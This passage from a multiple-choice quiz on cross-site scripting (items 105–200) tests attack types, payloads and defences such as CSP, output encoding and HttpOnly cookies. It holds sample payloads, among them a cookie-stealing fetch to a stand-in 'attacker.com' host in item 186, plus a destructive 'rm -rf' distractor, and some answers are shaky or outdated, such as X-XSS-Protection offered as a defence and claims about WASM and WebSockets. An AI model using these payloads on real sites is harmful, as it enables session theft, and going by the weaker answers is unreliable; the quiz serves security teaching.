A) By allowing all special characters
B) By checking and rejecting unexpected characters in user input
C) By replacing user input with a generic message
D) By enabling all JavaScript functions
Answer: B) By checking and rejecting unexpected characters in user input
Explanation: Input validation ensures that only expected data types and formats are accepted, reducing the risk of XSS.
106. Which of the following is not a recommended security practice for preventing XSS?
A) Using allowlists instead of blocklists
B) Encoding output before displaying it
C) Allowing unrestricted user input
D) Implementing a Content Security Policy (CSP)
Answer: C) Allowing unrestricted user input
Explanation: Allowing unrestricted user input without sanitization makes applications vulnerable to XSS.
107. Why is Reflected XSS considered less dangerous than Stored XSS?
A) It does not persist in the application
B) It cannot steal user credentials
C) It only works on old browsers
D) It cannot be executed automatically
Answer: A) It does not persist in the application
Explanation: Reflected XSS requires user interaction, while Stored XSS persists and can affect multiple users.
108. What is an effective way to test for DOM-based XSS?
A) Inserting <script>alert(1)</script> and monitoring JavaScript execution
B) Checking the page source for script tags
C) Disabling all security features
D) Using a VPN
Answer: A) Inserting <script>alert(1)</script> and monitoring JavaScript execution
Explanation: If the input is reflected and executed in the DOM without being sanitized, it indicates DOM-based XSS vulnerability.
109. What happens when JavaScript is disabled in a browser?
A) XSS attacks are completely prevented
B) Websites may break, but stored XSS scripts still execute
C) XSS attacks shift to other vectors, like phishing
D) It only affects Reflected XSS
Answer: C) XSS attacks shift to other vectors, like phishing
Explanation: Disabling JavaScript mitigates XSS, but attackers can still exploit other security weaknesses.
110. Which of the following is an advanced technique for bypassing XSS defenses?
A) Encoding payloads using multiple layers of obfuscation
B) Using plain text input
C) Blocking all user input
D) Disabling CSP headers
Answer: A) Encoding payloads using multiple layers of obfuscation
Explanation: Attackers use encoding and obfuscation techniques to evade security filters and execute malicious scripts.
111. Why is escaping output important in preventing XSS?
A) It makes the webpage load faster
B) It ensures that user input is not interpreted as executable code
C) It encrypts user input before displaying it
D) It disables JavaScript on the website
Answer: B) It ensures that user input is not interpreted as executable code
Explanation: Escaping output converts special characters like <, >, and & into harmless equivalents to prevent script execution.
112. What is a common attack goal of XSS?
A) To modify website performance
B) To execute malicious scripts in the victim’s browser
C) To disable HTML rendering
D) To manipulate the website’s CSS
Answer: B) To execute malicious scripts in the victim’s browser
Explanation: XSS enables attackers to run scripts that can steal data, hijack sessions, or deface websites.
113. Which of the following is a secure way to handle user input in a web application?
A) Allowing unrestricted HTML input
B) Encoding output before rendering it
C) Using innerHTML for dynamic content
D) Accepting JavaScript-based user input
Answer: B) Encoding output before rendering it
Explanation: Encoding output ensures that user input is displayed as plain text rather than executed as a script.
114. What makes document.referrer potentially dangerous in XSS attacks?
A) It allows attackers to steal cookies
B) It can be manipulated to execute malicious scripts if improperly used
C) It disables CSP headers
D) It removes all HTML tags from user input
Answer: B) It can be manipulated to execute malicious scripts if improperly used
Explanation: If a site directly uses document.referrer in a vulnerable context, attackers can manipulate it to inject and execute scripts.
115. How do attackers use XSS to deface websites?
A) By modifying server-side code
B) By injecting JavaScript to change page content dynamically
C) By replacing CSS stylesheets
D) By forcing the browser to delete cookies
Answer: B) By injecting JavaScript to change page content dynamically
Explanation: XSS enables attackers to manipulate the page content, leading to defacement.
116. Why is localStorage a common target for XSS attacks?
A) It is stored in an external database
B) It can be accessed by JavaScript, making it vulnerable to theft
C) It encrypts all stored data
D) It automatically deletes stored data
Answer: B) It can be accessed by JavaScript, making it vulnerable to theft
Explanation: Any JavaScript running in the context of the page can access localStorage, making it susceptible to XSS-based theft.
117. Which security measure is ineffective against XSS?
A) Using HTTPS
B) Validating and sanitizing user inputs
C) Implementing a strong CSP
D) Encoding output before rendering
Answer: A) Using HTTPS
Explanation: HTTPS protects data in transit but does not prevent XSS, as the attack occurs within the browser.
118. How can window.name be exploited in an XSS attack?
A) It allows remote code execution
B) It can be manipulated to store and retrieve malicious scripts
C) It prevents session hijacking
D) It blocks CSP policies
Answer: B) It can be manipulated to store and retrieve malicious scripts
Explanation: window.name persists across page reloads and can store data that attackers can exploit.
119. What is an XSS worm?
A) A virus that spreads through SQL Injection
B) A self-replicating XSS payload that spreads between users
C) A browser feature that prevents XSS
D) A method of blocking malicious scripts
Answer: B) A self-replicating XSS payload that spreads between users
Explanation: XSS worms propagate by exploiting stored XSS to infect multiple users, as seen in the MySpace Samy Worm.
120. How can CSP be bypassed in some cases?
A) By disabling JavaScript in the browser
B) By using JSON-based injection techniques
C) By leveraging trusted third-party sources allowed in the CSP
D) By modifying CSS files
Answer: C) By leveraging trusted third-party sources allowed in the CSP
Explanation: If a site allows unsafe third-party sources, attackers can inject malicious scripts from those trusted origins.
121. What is “Session Riding” in relation to XSS?
A) Exploiting session cookies to impersonate users
B) Bypassing login screens using URL manipulation
C) Injecting CSS to change session tokens
D) Disabling CSP headers
Answer: A) Exploiting session cookies to impersonate users
Explanation: XSS can be used to steal session cookies, allowing attackers to hijack user sessions.
122. How do modern browsers help protect against Reflected XSS?
A) By automatically blocking all JavaScript execution
B) By enabling built-in XSS filters
C) By forcing all websites to use CSP
D) By disabling cookie storage
Answer: B) By enabling built-in XSS filters
Explanation: Some browsers have built-in XSS filters that detect and block malicious scripts in reflected attacks.
123. What is an effective way to prevent DOM-based XSS?
A) Using innerHTML for all content updates
B) Avoiding dynamic updates with JavaScript
C) Using textContent instead of innerHTML for untrusted data
D) Storing all user input in a database
Answer: C) Using textContent instead of innerHTML for untrusted data
Explanation: textContent treats input as plain text, preventing the execution of injected scripts.
124. Why is Base64 encoding sometimes ineffective for XSS prevention?
A) Browsers do not support Base64
B) Attackers can decode and execute scripts after Base64 encoding
C) It slows down page rendering
D) It prevents all JavaScript execution
Answer: B) Attackers can decode and execute scripts after Base64 encoding
Explanation: Base64-encoded payloads can be decoded and executed dynamically, making them ineffective for preventing XSS.
125. What is a Shadow DOM, and how can it impact XSS?
A) A security feature that blocks XSS
B) A method for isolating JavaScript execution
C) A way to store encrypted user data
D) A browser caching mechanism
Answer: B) A method for isolating JavaScript execution
Explanation: The Shadow DOM can isolate scripts, but if improperly configured, it can still be exploited for XSS.
126. How can WebAssembly (WASM) introduce new XSS attack vectors?
A) WASM allows JavaScript to be executed in new contexts
B) WASM disables CSP protections
C) WASM only runs on secure websites
D) WASM blocks all script execution
Answer: A) WASM allows JavaScript to be executed in new contexts
Explanation: WASM can enable execution of malicious scripts if used improperly in web applications.
127. What is a race condition in the context of XSS?
A) Two scripts executing simultaneously, leading to unexpected behavior
B) A script that executes faster than normal
C) A delay in JavaScript execution
D) A method of speeding up web pages
Answer: A) Two scripts executing simultaneously, leading to unexpected behavior
Explanation: Race conditions can lead to unintended script execution if an attacker exploits the timing of events.
128. What is a common mistake that makes CSP ineffective against XSS?
A) Allowing unsafe-inline in CSP rules
B) Using HTTPS for scripts
C) Blocking third-party resources
D) Using JavaScript frameworks
Answer: A) Allowing unsafe-inline in CSP rules
Explanation: unsafe-inline allows inline scripts to execute, defeating the purpose of CSP in preventing XSS.
129. How do sandbox attributes in iframes help prevent XSS?
A) They disable JavaScript execution inside the iframe
B) They encrypt all iframe content
C) They allow only secure scripts to run
D) They force all websites to use HTTPS
Answer: A) They disable JavaScript execution inside the iframe
Explanation: sandbox attributes restrict iframe behavior, reducing the risk of XSS exploitation.
130. What is the primary reason attackers use WebSockets in XSS attacks?
A) To bypass same-origin policy restrictions
B) To prevent browser security warnings
C) To disable cookies
D) To make scripts execute faster
Answer: A) To bypass same-origin policy restrictions
Explanation: WebSockets allow cross-origin communication, making them a potential target for XSS exploitation.
131. Why is JSON commonly targeted in XSS attacks?
A) JSON responses are always encrypted
B) Attackers can inject scripts into improperly sanitized JSON data
C) JSON automatically blocks script execution
D) JSON cannot be modified by an attacker
Answer: B) Attackers can inject scripts into improperly sanitized JSON data
Explanation: If a web application improperly handles JSON data, it can allow script injection, leading to XSS vulnerabilities.
132. How can an attacker exploit a postMessage API for XSS?
A) By sending malicious data to an iframe or a cross-origin window
B) By disabling JavaScript in the victim’s browser
C) By modifying browser security settings
D) By blocking HTTP requests
Answer: A) By sending malicious data to an iframe or a cross-origin window
Explanation: If postMessage is used without validating the sender and data, attackers can inject malicious scripts.
133. Which CSP directive is specifically designed to control script execution?
A) frame-src
B) script-src
C) connect-src
D) img-src
Answer: B) script-src
Explanation: The script-src directive restricts JavaScript execution sources, helping to prevent XSS attacks.
134. What is the primary purpose of the sandbox attribute in an iframe?
A) It allows JavaScript execution
B) It isolates the iframe from running untrusted scripts
C) It disables cookies
D) It improves page load speed
Answer: B) It isolates the iframe from running untrusted scripts
Explanation: The sandbox attribute restricts iframe capabilities, reducing XSS risks.
135. How can an attacker use an XSS payload to perform keylogging?
A) By injecting a script that records keystrokes and sends them to a remote server
B) By modifying CSS stylesheets
C) By blocking JavaScript execution
D) By encrypting all form inputs
Answer: A) By injecting a script that records keystrokes and sends them to a remote server
Explanation: XSS can be used to log keystrokes, capturing user credentials and sensitive information.
136. What is the difference between Self-XSS and traditional XSS?
A) Self-XSS tricks users into executing scripts on their own browsers
B) Self-XSS affects all users on a website
C) Traditional XSS requires user authentication
D) Self-XSS cannot be exploited for malicious purposes
Answer: A) Self-XSS tricks users into executing scripts on their own browsers
Explanation: Self-XSS occurs when an attacker tricks a user into pasting and executing a script in their browser’s developer console.
137. What is the main limitation of browser-based XSS filters?
A) They can be bypassed with obfuscation techniques
B) They block all JavaScript execution
C) They disable user inputs
D) They only work in incognito mode
Answer: A) They can be bypassed with obfuscation techniques
Explanation: Attackers can encode or obfuscate XSS payloads to evade browser-based XSS filters.
138. Why is innerHTML dangerous for inserting untrusted user input?
A) It modifies CSS styles
B) It executes scripts inside HTML content
C) It prevents script execution
D) It only works in specific browsers
Answer: B) It executes scripts inside HTML content
Explanation: innerHTML renders HTML and JavaScript, making it a common target for XSS attacks.
139. How can an attacker use XSS to hijack a user’s session?
A) By injecting a script to steal cookies using document.cookie
B) By modifying browser cache settings
C) By encrypting user input
D) By injecting malformed SQL queries
Answer: A) By injecting a script to steal cookies using document.cookie
Explanation: Attackers use XSS to access session cookies, allowing them to impersonate the user.
140. What does the X-Content-Type-Options: nosniff header do?
A) It prevents MIME-type sniffing, reducing the risk of script execution
B) It blocks inline scripts
C) It encrypts user data
D) It forces browsers to disable JavaScript
Answer: A) It prevents MIME-type sniffing, reducing the risk of script execution
Explanation: This header ensures that the browser strictly follows MIME types, reducing attack vectors like MIME-based XSS.
141. Why should developers avoid dynamically inserting <script> tags with user input?
A) It can lead to XSS attacks by executing untrusted scripts
B) It improves website performance
C) It disables JavaScript execution
D) It makes debugging easier
Answer: A) It can lead to XSS attacks by executing untrusted scripts
Explanation: Dynamically inserting <script> tags with user input can lead to stored or reflected XSS vulnerabilities.
142. How can WebRTC be exploited in XSS attacks?
A) By allowing attackers to inject scripts through real-time communication channels
B) By disabling JavaScript in the browser
C) By modifying HTTP headers
D) By restricting access to third-party resources
Answer: A) By allowing attackers to inject scripts through real-time communication channels
Explanation: WebRTC can expose user IPs and may be used to transmit malicious scripts if improperly secured.
143. What is a common way attackers obfuscate XSS payloads?
A) Using URL encoding (%3Cscript%3E)
B) Encrypting JavaScript files
C) Using CSS injections
D) Disabling JavaScript execution
Answer: A) Using URL encoding (%3Cscript%3E)
Explanation: URL encoding disguises scripts to bypass security filters.
144. How does Subresource Integrity (SRI) help prevent XSS?
A) It ensures that external scripts are not tampered with
B) It disables all JavaScript execution
C) It blocks all third-party scripts
D) It forces browsers to use inline scripts
Answer: A) It ensures that external scripts are not tampered with
Explanation: SRI allows websites to verify the integrity of third-party scripts, reducing XSS risks.
145. Why is setAttribute("onclick", "...") dangerous for user input handling?
A) It allows direct execution of injected JavaScript
B) It blocks all JavaScript execution
C) It improves website security
D) It prevents XSS attacks
Answer: A) It allows direct execution of injected JavaScript
Explanation: setAttribute("onclick", "...") can be exploited if used with unsanitized user input.
146. What is an “XSS beacon”?
A) A hidden XSS script that sends stolen data to an attacker-controlled server
B) A JavaScript debugging tool
C) A web browser feature
D) A method for blocking JavaScript execution
Answer: A) A hidden XSS script that sends stolen data to an attacker-controlled server
Explanation: Attackers use XSS beacons to send stolen session data or credentials to an external server.
147. Why is eval() particularly dangerous in XSS attacks?
A) It executes arbitrary JavaScript code
B) It blocks security headers
C) It only works in Internet Explorer
D) It improves performance
Answer: A) It executes arbitrary JavaScript code
Explanation: eval() can execute untrusted JavaScript, making it a critical security risk.
148. How can developers test for DOM-based XSS?
A) By injecting document.location= payloads in input fields
B) By running a network penetration test
C) By disabling CSP headers
D) By checking HTTP response headers
Answer: A) By injecting document.location= payloads in input fields
Explanation: DOM-based XSS can be tested by manipulating the DOM dynamically in the browser.
149. Which JavaScript property is commonly used in XSS payloads?
A) document.cookie
B) window.onload
C) console.log()
D) innerText
Answer: A) document.cookie
Explanation: document.cookie is often targeted to steal session data.
150. What is a good defense against XSS attacks in React applications?
A) Using dangerouslySetInnerHTML
B) Avoiding direct manipulation of the DOM
C) Allowing unrestricted HTML rendering
D) Disabling JavaScript
Answer: B) Avoiding direct manipulation of the DOM
Explanation: Secure React applications avoid dangerouslySetInnerHTML and use proper state management to prevent XSS.
151. What is a common mistake that leads to XSS vulnerabilities?
A) Using parameterized queries for database access
B) Allowing user input to be executed as JavaScript
C) Encoding user input before rendering
D) Disabling JavaScript execution
Answer: B) Allowing user input to be executed as JavaScript
Explanation: Allowing user input to be executed as JavaScript without proper sanitization or encoding leads to XSS vulnerabilities.
152. Which of the following is a valid example of an XSS payload?
A) <script>alert('XSS');</script>
B) SELECT * FROM users WHERE id='1'
C) rm -rf /home/user
D) cd /var/www/html
Answer: A) <script>alert('XSS');</script>
Explanation: XSS payloads inject and execute malicious JavaScript within a vulnerable web page.
153. Why are dynamically generated error messages a potential XSS risk?
A) They allow attackers to inject malicious scripts into responses
B) They expose the database schema
C) They make the website load slower
D) They disable security features
Answer: A) They allow attackers to inject malicious scripts into responses
Explanation: If error messages include unescaped user input, they can be exploited for XSS attacks.
154. How can input validation help prevent XSS?
A) By checking and rejecting unexpected characters before rendering input
B) By allowing all input to be executed as scripts
C) By preventing SQL injection
D) By enabling JavaScript in browsers
Answer: A) By checking and rejecting unexpected characters before rendering input
Explanation: Proper input validation ensures that only expected data types and formats are accepted, reducing the risk of XSS.
155. Which HTTP security header can help mitigate XSS attacks?
A) Strict-Transport-Security
B) X-XSS-Protection
C) Cache-Control
D) ETag
Answer: B) X-XSS-Protection
Explanation: X-XSS-Protection instructs browsers to detect and block reflected XSS attacks.
156. What is a common technique for bypassing XSS filters?
A) Using encrypted cookies
B) Encoding payloads with hexadecimal, Base64, or URL encoding
C) Using HTTPS for communication
D) Modifying database queries
Answer: B) Encoding payloads with hexadecimal, Base64, or URL encoding
Explanation: Attackers use encoding techniques to obfuscate their scripts and evade detection by security filters.
157. Why is an open redirect vulnerability often paired with XSS?
A) To trick users into visiting malicious websites
B) To slow down the website
C) To modify HTTP headers
D) To disable browser security settings
Answer: A) To trick users into visiting malicious websites
Explanation: Open redirects combined with XSS allow attackers to redirect victims to phishing pages or malicious websites.
158. What is an example of an XSS payload using the onmouseover event?
A) <a href="#" onmouseover="alert('XSS')">Hover me</a>
B) SELECT * FROM users WHERE id=1;
C) <iframe src="xss.html"></iframe>
D) echo "XSS attack"
Answer: A) <a href="#" onmouseover="alert('XSS')">Hover me</a>
Explanation: JavaScript event handlers like onmouseover can be exploited to execute XSS payloads.
159. Why is window.location dangerous when used with unvalidated user input?
A) It redirects users without validation, allowing XSS exploitation
B) It encrypts all JavaScript files
C) It disables security headers
D) It prevents script execution
Answer: A) It redirects users without validation, allowing XSS exploitation
Explanation: If window.location is modified by user input without proper validation, it can be used to inject and execute scripts.
160. What does CSP frame-ancestors 'none' do?
A) It prevents the page from being embedded in iframes
B) It blocks all external JavaScript
C) It forces scripts to execute in a secure sandbox
D) It encrypts all user input
Answer: A) It prevents the page from being embedded in iframes
Explanation: This directive prevents clickjacking attacks by blocking unauthorized embedding in iframes.
161. Which of the following is an effective way to prevent Reflected XSS?
A) Storing all user input in session storage
B) Encoding user input before displaying it in HTML
C) Allowing inline JavaScript execution
D) Using document.write() for all page content
Answer: B) Encoding user input before displaying it in HTML
Explanation: Encoding user input ensures that special characters are displayed as plain text rather than being executed as scripts.
162. What is the role of sanitize libraries like DOMPurify in XSS prevention?
A) They remove malicious scripts from user-generated content
B) They encrypt cookies for better security
C) They disable JavaScript execution
D) They allow all user input to be stored without modification
Answer: A) They remove malicious scripts from user-generated content
Explanation: Libraries like DOMPurify sanitize HTML content to prevent XSS attacks.
163. How does an attacker exploit XSS through hidden form fields?
A) By injecting JavaScript that modifies the form fields before submission
B) By changing the CSS properties of the form
C) By deleting the form fields
D) By using a VPN to hide their IP
Answer: A) By injecting JavaScript that modifies the form fields before submission
Explanation: Attackers can use XSS to modify hidden form fields, potentially altering data sent to the server.
164. What is an effective way to prevent DOM-based XSS?
A) Using textContent instead of innerHTML
B) Disabling all JavaScript execution
C) Using a CAPTCHA system
D) Storing input values in local storage
Answer: A) Using textContent instead of innerHTML
Explanation: textContent treats input as plain text, preventing it from being interpreted as executable code.
165. Why is it dangerous to use eval() with user input?
A) It executes user-provided JavaScript, leading to XSS risks
B) It disables cookies
C) It prevents SQL injection
D) It only works in modern browsers
Answer: A) It executes user-provided JavaScript, leading to XSS risks
Explanation: eval() should be avoided because it can execute arbitrary and potentially malicious JavaScript.
166. Which tool is commonly used to test for XSS vulnerabilities?
A) Burp Suite
B) Wireshark
C) Nmap
D) Nikto
Answer: A) Burp Suite
Explanation: Burp Suite is widely used for web security testing, including detecting XSS vulnerabilities.
167. How does an attacker exploit an iframe for XSS?
A) By embedding a malicious iframe that loads an external script
B) By changing the iframe’s border color
C) By using HTTPS instead of HTTP
D) By modifying browser cache settings
Answer: A) By embedding a malicious iframe that loads an external script
Explanation: Attackers use iframes to load malicious scripts or redirect users to compromised sites.
168. What is “JavaScript Injection” in the context of XSS?
A) Injecting and executing malicious JavaScript in a vulnerable web application
B) Using JavaScript to encrypt user input
C) Disabling JavaScript on the client side
D) Removing all security headers from a website
Answer: A) Injecting and executing malicious JavaScript in a vulnerable web application
Explanation: JavaScript Injection is a form of XSS where attackers insert malicious JavaScript into web applications.
169. What is an example of an XSS attack on a login page?
A) Injecting a keylogger script to steal entered credentials
B) Changing the background color of the login form
C) Disabling CAPTCHA verification
D) Using a strong password
Answer: A) Injecting a keylogger script to steal entered credentials
Explanation: Attackers can use XSS to inject keyloggers that capture user credentials.
170. Why is http-equiv="Content-Security-Policy" sometimes used in meta tags?
A) To enforce CSP rules even if headers are not configured
B) To disable all JavaScript execution
C) To store session data in cookies
D) To block form submissions
Answer: A) To enforce CSP rules even if headers are not configured
Explanation: CSP can be set via meta tags if the server does not send proper security headers.
171. What is an XSS payload that exploits the onerror event?
A) <img src="invalid.jpg" onerror="alert('XSS')">
B) <script>alert('XSS')</script>
C) document.cookie
D) SELECT * FROM users WHERE id=1;
Answer: A) <img src="invalid.jpg" onerror="alert('XSS')">
Explanation: The onerror event triggers when an image fails to load, making it a common technique for XSS payload execution.
172. How can WebSockets be abused in XSS attacks?
A) By transmitting malicious scripts if user input is not validated
B) By disabling browser security settings
C) By modifying the server’s response headers
D) By encrypting HTTP traffic
Answer: A) By transmitting malicious scripts if user input is not validated
Explanation: WebSockets allow bidirectional communication, and if not properly validated, attackers can send malicious scripts.
173. What does the CSP directive unsafe-inline allow?
A) Inline JavaScript execution
B) Only external scripts to run
C) Blocking all scripts from running
D) Automatic encryption of JavaScript files
Answer: A) Inline JavaScript execution
Explanation: unsafe-inline permits inline scripts, making it a security risk as it allows XSS execution.
174. How does an attacker exploit innerHTML for XSS?
A) By injecting a script inside an element that uses innerHTML
B) By encrypting user data
C) By modifying CSS styles
D) By using a VPN
Answer: A) By injecting a script inside an element that uses innerHTML
Explanation: innerHTML interprets injected content as HTML and JavaScript, making it vulnerable to XSS.
175. What is “Reflected XSS via URL Parameters”?
A) XSS that executes when a malicious script is injected into a URL parameter
B) XSS that only works on old browsers
C) XSS that modifies database records
D) XSS that targets server-side code
Answer: A) XSS that executes when a malicious script is injected into a URL parameter
Explanation: Reflected XSS occurs when a script is passed via a URL and executed in the browser.
176. What is the risk of allowing user-generated JavaScript in a web application?
A) It can lead to stored XSS vulnerabilities
B) It improves performance
C) It helps encrypt cookies
D) It prevents SQL Injection
Answer: A) It can lead to stored XSS vulnerabilities
Explanation: Allowing users to insert JavaScript without proper filtering can enable stored XSS attacks.
177. Which function should be avoided when processing user input in JavaScript?
A) eval()
B) console.log()
C) parseInt()
D) JSON.stringify()
Answer: A) eval()
Explanation: eval() executes arbitrary JavaScript and is a common source of XSS vulnerabilities.
178. What is an “XSS scanner” used for?
A) To detect and test for XSS vulnerabilities in web applications
B) To encrypt JavaScript files
C) To log user activity
D) To bypass security headers
Answer: A) To detect and test for XSS vulnerabilities in web applications
Explanation: XSS scanners help identify and mitigate potential XSS vulnerabilities in applications.
179. How can JavaScript setTimeout() be exploited in an XSS attack?
A) By delaying the execution of a malicious script to bypass security filters
B) By encrypting user input
C) By blocking JavaScript execution
D) By modifying browser security settings
Answer: A) By delaying the execution of a malicious script to bypass security filters
Explanation: setTimeout() can be used to delay execution, sometimes allowing XSS payloads to bypass security checks.
180. Why should session cookies use the HttpOnly flag?
A) To prevent JavaScript from accessing cookies, reducing the risk of XSS attacks
B) To encrypt all cookies
C) To disable JavaScript in the browser
D) To block all user input
Answer: A) To prevent JavaScript from accessing cookies, reducing the risk of XSS attacks
Explanation: HttpOnly prevents client-side JavaScript from accessing cookies, mitigating XSS-based session hijacking.
181. What is a common attack scenario for DOM-based XSS?
A) Manipulating a JavaScript function that updates the DOM with user input
B) Encrypting HTTP requests
C) Using SQL Injection to modify the DOM
D) Sending phishing emails
Answer: A) Manipulating a JavaScript function that updates the DOM with user input
Explanation: DOM-based XSS occurs when JavaScript dynamically modifies the page using unvalidated user input.
182. What is the impact of “Clickjacking” when combined with XSS?
A) It can trick users into clicking on hidden malicious elements
B) It disables JavaScript
C) It modifies HTTP headers
D) It prevents session hijacking
Answer: A) It can trick users into clicking on hidden malicious elements
Explanation: Clickjacking combined with XSS can force users to perform unintended actions on a website.
183. What does the Referrer-Policy: no-referrer header do?
A) It prevents browsers from sending the HTTP referrer header, reducing data leaks
B) It encrypts JavaScript files
C) It disables cookies
D) It blocks all scripts
Answer: A) It prevents browsers from sending the HTTP referrer header, reducing data leaks
Explanation: The no-referrer policy prevents sensitive referrer information from being shared across requests.
184. What is an XSS “payload”?
A) A malicious script injected into a vulnerable web application
B) A secure method for encoding user data
C) A tool used to prevent XSS attacks
D) A framework for writing JavaScript
Answer: A) A malicious script injected into a vulnerable web application
Explanation: XSS payloads are malicious scripts injected into vulnerable web applications.
185. Why is document.URL dangerous in the context of XSS?
A) It can be modified by attackers to execute scripts
B) It encrypts JavaScript files
C) It blocks user input
D) It disables browser security settings
Answer: A) It can be modified by attackers to execute scripts
Explanation: If improperly handled, document.URL can be exploited to execute XSS payloads.
186. What is an example of an XSS payload that exfiltrates cookies?
A) <script>fetch('http://attacker.com?cookie='+document.cookie)</script>
B) SELECT * FROM users WHERE id=1;
C) console.log('Hello, world!')
D) alert('This is a test')
Answer: A) <script>fetch('http://attacker.com?cookie='+document.cookie)</script>
Explanation: This script steals cookies by sending them to an attacker’s server.
187. What is the main weakness of using a blacklist approach to prevent XSS?
A) Attackers can use encoding techniques to bypass filters
B) It completely blocks JavaScript execution
C) It improves website performance
D) It encrypts all user input
Answer: A) Attackers can use encoding techniques to bypass filters
Explanation: Blacklist-based filtering can be bypassed using various encoding techniques.
188. What is an example of an event-driven XSS attack?
A) onmouseover="alert('XSS')"
B) document.cookie
C) console.log('Hello!')
D) localStorage.getItem('data')
Answer: A) onmouseover="alert('XSS')"
Explanation: JavaScript event handlers like onmouseover can be exploited to trigger XSS payloads.
189. What is a “Polyglot XSS Payload”?
A) A payload that works in multiple contexts and encoding schemes
B) A script that encrypts JavaScript files
C) A method to block XSS
D) A framework for secure JavaScript
Answer: A) A payload that works in multiple contexts and encoding schemes
Explanation: Polyglot XSS payloads are crafted to work across different security filters and execution environments.
190. What does X-Frame-Options: DENY do?
A) It prevents the website from being embedded in an iframe
B) It encrypts user input
C) It allows JavaScript execution
D) It enables inline scripts
Answer: A) It prevents the website from being embedded in an iframe
Explanation: X-Frame-Options: DENY protects against Clickjacking attacks by blocking iframe embedding.
191. What does the X-Content-Type-Options: nosniff header prevent?
A) MIME-type sniffing attacks that can lead to script execution
B) JavaScript execution from third-party domains
C) Automatic encryption of cookies
D) Disabling of JavaScript on the website
Answer: A) MIME-type sniffing attacks that can lead to script execution
Explanation: This header prevents browsers from interpreting non-script files as scripts, reducing the risk of content-type-based XSS attacks.
192. How does an attacker use a Cross-Site Script Inclusion (XSSI) attack?
A) By stealing JSON responses that contain sensitive data
B) By injecting JavaScript into HTML comments
C) By modifying CSS styles
D) By encrypting user input
Answer: A) By stealing JSON responses that contain sensitive data
Explanation: XSSI occurs when an attacker loads a site’s JSON API response in their own page to extract sensitive data.
193. What is an effective way to prevent XSSI attacks?
A) Using JSON with a prefix that prevents script execution ()]}',)
B) Storing all user data in cookies
C) Using only HTTPS
D) Disabling JavaScript execution
Answer: A) Using JSON with a prefix that prevents script execution ()]}',)
Explanation: Adding a prefix like )]}', makes JSON responses invalid as JavaScript, preventing them from being used in XSSI attacks.
194. What is an XSS payload that exploits JavaScript URL schemes?
A) <a href="javascript:alert('XSS')">Click me</a>
B) console.log('XSS test')
C) <input type="hidden" name="xss" value="<script>">
D) SELECT * FROM users WHERE id=1;
Answer: A) <a href="javascript:alert('XSS')">Click me</a>
Explanation: The javascript: URL scheme can be used to execute arbitrary JavaScript when a user clicks a link.
195. What is the risk of allowing document.write() to insert user-generated content?
A) It can execute malicious scripts inserted by an attacker
B) It improves website performance
C) It prevents XSS
D) It disables JavaScript execution
Answer: A) It can execute malicious scripts inserted by an attacker
Explanation: document.write() directly inserts HTML content, making it vulnerable to XSS if used with untrusted input.
196. What is a “Malvertising” attack involving XSS?
A) An attacker injects malicious scripts into online advertisements
B) A script that modifies CSS styles
C) A technique used for password hashing
D) An attack that blocks JavaScript execution
Answer: A) An attacker injects malicious scripts into online advertisements
Explanation: Malvertising uses ad networks to distribute XSS payloads, infecting users who view or interact with the ads.
197. Why should developers avoid using innerHTML for dynamically inserting untrusted content?
A) It treats the content as executable HTML and JavaScript
B) It encrypts the content
C) It automatically encodes user input
D) It blocks all JavaScript execution
Answer: A) It treats the content as executable HTML and JavaScript
Explanation: innerHTML interprets inserted content as HTML, allowing script execution if not properly sanitized.
198. How can JavaScript’s fetch() function be abused in XSS attacks?
A) By sending stolen data to an attacker-controlled server
B) By modifying local storage
C) By blocking security headers
D) By disabling cookies
Answer: A) By sending stolen data to an attacker-controlled server
Explanation: fetch() can be used in XSS payloads to exfiltrate sensitive data, such as authentication tokens or session cookies.
199. What is the impact of a self-executing JavaScript function in an XSS attack?
A) It runs immediately when injected into a vulnerable site
B) It disables JavaScript execution
C) It modifies database records
D) It blocks all HTML rendering
Answer: A) It runs immediately when injected into a vulnerable site
Explanation: Self-executing JavaScript functions ((function(){})()) allow XSS payloads to run as soon as they are injected.
200. What is an advanced technique for bypassing CSP protections in XSS attacks?
A) Exploiting JSONP endpoints to execute scripts
B) Disabling all JavaScript in the browser
C) Using only HTTPS requests
D) Encrypting user input
Answer: A) Exploiting JSONP endpoints to execute scripts
Explanation: JSONP allows script execution from third-party sources, which can be abused to bypass CSP restrictions.